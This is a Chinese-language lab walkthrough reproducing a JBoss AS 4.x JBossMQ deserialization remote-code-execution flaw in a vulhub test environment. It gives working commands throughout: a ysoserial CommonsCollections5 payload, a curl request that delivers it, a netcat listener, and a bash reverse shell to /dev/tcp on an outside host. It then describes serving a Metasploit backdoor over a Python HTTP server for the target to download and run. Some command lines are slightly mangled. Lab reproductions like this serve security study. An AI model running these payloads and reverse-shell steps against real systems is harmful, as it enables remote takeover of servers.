漏洞介绍

JBOSS AS 4.x及之前版本中,JBOSSMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码

环境搭建（使用docker+vulhub）

Vulhub下载地址：https://github.com/vulhub
进入到漏洞所在的目录，使用命令 docker-compose build && docker-compose up -d 下载漏洞环境文件，并且运行

成功启动环境以后，进入浏览器验证是否搭建成功（http://ip:8080）。

漏洞复现

该漏洞出现在/JBOSSmq-httpil/HTTPServerILServlet请求中，我们借助ysoserial的eCommonsCollections5利用链来复现。
ysoserial是在通用Java库中发现的实用程序和面向属性的编程“小工具链”的集合，可以在适当的条件下利用Java应用程序对对象执行不安全的反序列化。主驱动程序接受用户指定的命令，并将其包装在用户指定的小工具链中，然后将这些对象序列化为stdout。当在类路径上具有必需小工具的应用程序不安全地反序列化此数据时，该链将自动被调用并导致命令在应用程序主机上执行。
生成Payload：本处使用了一个创建文件的命令作为测试。ysoserial包的下载放在了结尾附件中
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 “touch /tmp/success” > 1.ser

我们将1.ser文件内容作为POST Body发送：
curl http://your-ip:8080/JBOSSmq-httpil/HTTPServerILServlet —data-binary <span>@1.ser#CTL{n}#CTL{n}
使用反序列化漏洞执行了一条命令，用于创建文件successs。
打开Ubuntu查看文件是否成功；可见/tmp/success已成功创建

反弹shell

在Kali端使用Netcat进行端口监听，用于接收反弹到的Shell
命令：nc -lvvp 4444

将远程命令执行的命令换为bash的反弹命令，从而触发目标机将Shell反弹到我们手中。
命令：java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -i >& /dev/tcp/192.168.88.146/4444 0>&" > 2.ser

命令被成功执行，这个时候Kali端的Netcat成功接收到目标的Shell。

下载后门并获取meterpreter

因为我们已经获取到了目标的Shell，可以通过Metasploit生成一个Linux的后门，利用Python搭建一个临时的服务器，使用目标机的Shell下载我们使用Metasploit生成的后门文件，并且执行，获取到Meterpreter。
１. 利用Metasploit生成Linux的后门文件。

２.使用Python搭建临时的服务器，用于目标下载文件
命令：python3 -m http.server 8888

设置Metasploit开启监听，用于接收返回的Meterpreter

４.使用已经获取到的目标的Shell下载后门文件，赋予执行权限并且执行。

５.获取到Meterpreter